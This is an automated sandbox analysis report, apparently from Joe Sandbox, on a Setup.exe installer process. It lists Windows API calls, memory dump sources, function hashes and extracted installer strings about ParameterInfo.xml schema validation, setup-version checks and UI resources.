• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: +$ActionTable$ApplicableIf$Compressed$CompressedDownloadSize$CompressedHashValue$CustomErrorHandling$EstimatedInstallTime$IsPresent$Name$ParameterInfo.xml$RepairOverride$UninstallOverride$schema validation failure: ServiceControl does not support Compressed attributes!$schema validation failure: ServiceControl does not support RepairOverride or UninstallOverride child elements!
• API String ID: 431132790-3507379325
• Opcode ID: 4a23a97959a2f40c8e5009fc258e6b0bb5ff0322a8831a07931afa7e8959a18c
• Instruction ID: 91bbbd3e238be2cc5c0d8357a05111da21bac3ff524d64b4fd80d8ac855fca23
• Opcode Fuzzy Hash: 4a23a97959a2f40c8e5009fc258e6b0bb5ff0322a8831a07931afa7e8959a18c
• Instruction Fuzzy Hash: FB122EB1904249EFDF04DFA8C944AEEBBB8BF09314F148169F825EB691D734DA05CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 698E61A0
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698E1E75: __EH_prolog3.LIBCMT ref: 698E1E7C
  • Part of subcall function 698E1E75: GetThreadLocale.KERNEL32(?,00000004,698E6734,0000004C,0000004C,698E7142,?,00000000), ref: 698E1E8E
• PathIsRelativeW.SHLWAPI(?,?,?,0000003C,698F7332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 698E61E9
• PathFileExistsW.SHLWAPI(?), ref: 698E61F6
• PathFileExistsW.SHLWAPI(?,?), ref: 698E622B
• PathFileExistsW.SHLWAPI(?), ref: 698E6230
• CoInitialize.OLE32(00000000), ref: 698E6299
• CoUninitialize.OLE32(?,?), ref: 698E6340
• __CxxThrowException@8.LIBCMT ref: 698E63B7
• __EH_prolog3.LIBCMT ref: 698E63C9
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
• String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml
• API String ID: 1923347782-1246989722
• Opcode ID: c74a911b0cc0674d1fb09a64eabe89a23c1cb74c59543d20bcc1799cc5551fc2
• Instruction ID: 3fa750959913540cdbb1a256d81912dd30bd365fa04aa0e5c71d6034173f06a1
• Opcode Fuzzy Hash: c74a911b0cc0674d1fb09a64eabe89a23c1cb74c59543d20bcc1799cc5551fc2
• Instruction Fuzzy Hash: F3A1AC75900149EFDF00CFB8C944BAEBBB8AF15318F14895DE524EB291DB31DA0ACB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered control-flow graph omitted: function 69db0c91, basic blocks 69db0c91 through 69db1014; Windows API calls GetModuleHandleW, GetLastError, GetNativeSystemInfo; internal callees 69dd6e8d, 69da833e, 69db1236, 69dc8f0e, 69dd6f1f, 69d74e07, 69d7c5d4, 69d74fd5, 69d74fac, 69dce770, 69d75727, 69db356c, 69d7712b. Nodes were marked Executed / Not Executed in the original rendering.]
APIs
• __EH_prolog3_GS.LIBCMT ref: 69DB0C9B
• GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,69DAA587,?,69D6A794,?,02602230,?,00000000,?,Failed to record current state name), ref: 69DB0CAD
• GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 69DB0CCC
  • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
• GetNativeSystemInfo.KERNEL32(?), ref: 69DB0D21
• GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 69DB0DB2
• GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 69DB0E38
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
• String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
• API String ID: 684166175-3561000745
• Opcode ID: 8aef7511046273973b0bdd8d9ddcf02100e934c1720d73fee420b35ed42e2d68
• Instruction ID: 0fbb651796302381324c91a51e2ebea9fe20249d8ba176eacb3e2bf36fab8970
• Opcode Fuzzy Hash: 8aef7511046273973b0bdd8d9ddcf02100e934c1720d73fee420b35ed42e2d68
• Instruction Fuzzy Hash: B4A1E675900259EFDB20DBB4CE09B8DB7B9AF45308F1085F4E405EB694DB74EA888B61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 698ED150
  • Part of subcall function 698DC419: __EH_prolog3.LIBCMT ref: 698DC420
  • Part of subcall function 698DC419: GetModuleFileNameW.KERNEL32(698D0000,00000010,00000104), ref: 698DC46D
  • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
• LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED198
• SendMessageW.USER32(?,00000080,00000001,00000000), ref: 698ED1AF
• LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED1E4
• GetDlgItem.USER32(?,00000068), ref: 698ED1F5
• SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698ED209
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED231
• GetDlgItem.USER32(?,00000069), ref: 698ED242
• SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED256
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED27E
• GetDlgItem.USER32(?,0000006A), ref: 698ED28F
• SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED2A3
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                                                                                                                                    • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                                                                                                                                    • API String ID: 1194837009-3827646805
                                                                                                                                                                    • Opcode ID: 63ddbb1d70950aa09d37f7b0aafd4224159d622538a404fcab47aec794bdbd66
                                                                                                                                                                    • Instruction ID: c853340680e707d1fcae1c779069940d8ef352f115b6ab5c8a8fe269990a1064
                                                                                                                                                                    • Opcode Fuzzy Hash: 63ddbb1d70950aa09d37f7b0aafd4224159d622538a404fcab47aec794bdbd66
                                                                                                                                                                    • Instruction Fuzzy Hash: 77415434640709AFEF209BA4CC56FAAB7A9BF56704F404C19F265EA0D0CBB2E418DB10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D887B7
  • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
  • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
  • Part of subcall function 69D795C1: __EH_prolog3.LIBCMT ref: 69D795C8
  • Part of subcall function 69D795C1: VariantInit.OLEAUT32(?), ref: 69D795DB
  • Part of subcall function 69D795C1: SysFreeString.OLEAUT32(?), ref: 69D7960E
  • Part of subcall function 69D795C1: VariantClear.OLEAUT32(00000008), ref: 69D7962E
  • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
• __CxxThrowException@8.LIBCMT ref: 69D88D0A
  • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8ThrowVariant$ClearDispatcherExceptionFreeInitStringUser
• String ID: 1$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$Exe$InstallCommandLine$IsPresent$LogFileHint$ParameterInfo.xml$RepairCommandLine$UninstallCommandLine$schema validation failure: wrong number of EXE child nodes!
• API String ID: 1022868530-2895508641
• Opcode ID: b9458fe3fc7d0f14cfd2105f8e2507859ce1fe50d5017de1c772f4a01c60ff9f
• Instruction ID: 2ba2029dc016f4009bb5fdcda63704e894c8be5ea8c55fa015184db562994455
• Opcode Fuzzy Hash: b9458fe3fc7d0f14cfd2105f8e2507859ce1fe50d5017de1c772f4a01c60ff9f
• Instruction Fuzzy Hash: 3B321B75A00249EFDF04DFA8C944A9EBBB9BF09314F148169F825EB791C734EA05CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
• GetCommandLineW.KERNEL32(F0D05EFD,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 69DB9D54
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
  • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
• __CxxThrowException@8.LIBCMT ref: 69DB9EBD
Strings
• SetupVersion specified in ParameterInfo.xml is , xrefs: 69DBA029
• SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 69DB9F44
• higher, xrefs: 69DBA001, 69DBA017
• SetupVersion not specified, xrefs: 69DB9E1F
• Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 69DB9D95
• SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 69DB9EC3
• SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 69DB9F58
• 1.0, xrefs: 69DB9D3D, 69DB9D42, 69DB9ED4, 69DB9EFB
• NoSetupVersionCheck, xrefs: 69DB9D6C
• SetupVersion, xrefs: 69DB9DC0
• Current SetupVersion = %s, xrefs: 69DB9D43
• lower, xrefs: 69DB9FFA
• than the currently supported version., xrefs: 69DBA006
• ParameterInfo.xml, xrefs: 69DB9E2E, 69DB9F67, 69DBA096
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CommandException@8LineThrow
• String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
• API String ID: 1129948358-1674238012
• Opcode ID: 20c37f6a2bbc9ea0cc8e56d120663037ceeca5d00b89f95fb153df9438d9551d
• Instruction ID: fbba8338d82de48e0dc961fc133241b61e3a9d602a34e4ab74626831be3c0f1a
• Opcode Fuzzy Hash: 20c37f6a2bbc9ea0cc8e56d120663037ceeca5d00b89f95fb153df9438d9551d
• Instruction Fuzzy Hash: C8C140765087809FD710DB68C880F5EB7E8AF95318F548A2CF1A1C76A1DB34D949CB63
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D89851
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC0F9
  • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC113
  • Part of subcall function 69DCC0AA: __CxxThrowException@8.LIBCMT ref: 69DCC124
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D78AAC: __EH_prolog3.LIBCMT ref: 69D78AB3
  • Part of subcall function 69D78AAC: __CxxThrowException@8.LIBCMT ref: 69D78B39
  • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
  • Part of subcall function 69D8784C: __EH_prolog3.LIBCMT ref: 69D87853
  • Part of subcall function 69D78D44: __CxxThrowException@8.LIBCMT ref: 69D78EFD
  • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
  • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
  • Part of subcall function 69D81C2E: __EH_prolog3.LIBCMT ref: 69D81C35
  • Part of subcall function 69D81C2E: __CxxThrowException@8.LIBCMT ref: 69D81D02
  • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
  • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
  • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
• __CxxThrowException@8.LIBCMT ref: 69D8A060
  • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
  • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
  • Part of subcall function 69D7A3BC: __EH_prolog3.LIBCMT ref: 69D7A3C3
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw$std::exception::exception$DispatcherExceptionUser_malloc
• String ID: $<$A helper with this name already exists. All helper names must be unique. : $ActionTable$ApplicableIf$Cannot create the helper item: $CommandLine$InstalledProductSize$IsPresent$Name$ParameterInfo.xml$Patches$SystemDriveSize
• API String ID: 2177076360-1307745120
• Opcode ID: 74ad59147e9ce358c26f874d72d360f2982609dffce23693076c5ecef6088ebb
• Instruction ID: bb15140973fa40ce73eed24d483b2f999ed713dd567eb7ea4002b995e056ae63
• Opcode Fuzzy Hash: 74ad59147e9ce358c26f874d72d360f2982609dffce23693076c5ecef6088ebb
• Instruction Fuzzy Hash: F5523BB1901249DFDB01CFE4CA44BEEBBB8BF09318F108169E554BB691D7749A05CBA1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D82944
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D82677: __EH_prolog3.LIBCMT ref: 69D8267E
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D82C00
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                                                                                                    • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                                                                                                                                    • API String ID: 3417717588-4180151753
                                                                                                                                                                    • Opcode ID: 0827ab47f6669a479d802204dd73726572148bf19e249ef2e51e5a3cb27482d4
                                                                                                                                                                    • Instruction ID: 0ab8ef556cfa58af987971e878f4bb792da603648aa19e76a645038cc2fe087c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0827ab47f6669a479d802204dd73726572148bf19e249ef2e51e5a3cb27482d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF18071900289EBCF04DBE8C944ADE7BB8AF19358F14C169F515EBA81DB34DA05CB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,69A727B0,00000000,69A90088), ref: 69A72D01
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,69A727B0,00000000,69A90088), ref: 69A72D4F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID: Local\SqmData_%s
                                                                                                                                                                    • API String ID: 4275171209-1264235261
                                                                                                                                                                    • Opcode ID: 8e54ea624b17bad83e82ea8625d515dd2a723ce6b4cc9334c073622562723359
                                                                                                                                                                    • Instruction ID: 43194a005fd0ea3b4aa1bd8846a7f2a1a9311ffc453aad5a946440bf1f276d44
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e54ea624b17bad83e82ea8625d515dd2a723ce6b4cc9334c073622562723359
                                                                                                                                                                    • Instruction Fuzzy Hash: 80B1C275550340AFD7A48F24CE46F663BE9FB01B88F1480A8E9A9DE5A1DB71D8C6CF40
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7BB43
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7BDEB
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: there must be a valid child element for Configuration., xrefs: 69D7BD5C
                                                                                                                                                                    • DownloadInstallSetting, xrefs: 69D7BC4B
                                                                                                                                                                    • BlockingMutex, xrefs: 69D7BC9D
                                                                                                                                                                    • FilesInUseSetting, xrefs: 69D7BCEF
                                                                                                                                                                    • UserExperienceDataCollection, xrefs: 69D7BBF8
                                                                                                                                                                    • Using Simultaneous Download and Install mechanism, xrefs: 69D7BE01
                                                                                                                                                                    • Using Serial Download and Install mechanism, xrefs: 69D7BDFA
                                                                                                                                                                    • AdditionalCommandLineSwitches, xrefs: 69D7BBA6
                                                                                                                                                                    • DisabledCommandLineSwitches, xrefs: 69D7BB52
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D7BD6A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                                                                                                                                    • API String ID: 2489616738-904804324
                                                                                                                                                                    • Opcode ID: 911ff7b252f2c2835879cf6cc998c1542401b4bedc12de8312374f1ea106a4c8
                                                                                                                                                                    • Instruction ID: 8fb6a15fb71642265df1c86923072daa6b5bd5d3285490d07852929b52e02fbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 911ff7b252f2c2835879cf6cc998c1542401b4bedc12de8312374f1ea106a4c8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA12E75900249EFDB10DFA8C945AAEBBB9BF09314F148165F815EB780C734DA14CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 698F652C
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698EE93B: __EH_prolog3.LIBCMT ref: 698EE942
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 698F6596
                                                                                                                                                                      • Part of subcall function 698F697A: __EH_prolog3.LIBCMT ref: 698F6981
                                                                                                                                                                      • Part of subcall function 698F697A: CoCreateInstance.OLE32(698D7980,00000000,00000017,698D7970,?,?,00000068,698F65A6,?,?,?,?,698F2A30,?,00000000,?), ref: 698F69AC
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7930,00000000,00000017,698D7970,00000001,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?), ref: 698F65BE
                                                                                                                                                                    • CoUninitialize.OLE32(?,00000000,00000000,?,?,succeeded,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?), ref: 698F66E1
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698F6773
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                                                                                                                                    • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                                                                                                                                    • API String ID: 4239111664-3845428783
                                                                                                                                                                    • Opcode ID: df6b4478d643b0676342b4771d7353b0f6405b06a9ebc8dde895db549f1e94ea
                                                                                                                                                                    • Instruction ID: e2ba885d2bf4be97e49f2d3ba091770106ecde1fd3e3fcc5c01e2d4f2b22a0c7
                                                                                                                                                                    • Opcode Fuzzy Hash: df6b4478d643b0676342b4771d7353b0f6405b06a9ebc8dde895db549f1e94ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 24815C7590024CEFDF00CFA8C848ADEBBB8AF59318F54995DE515EB251C735DA0ACBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

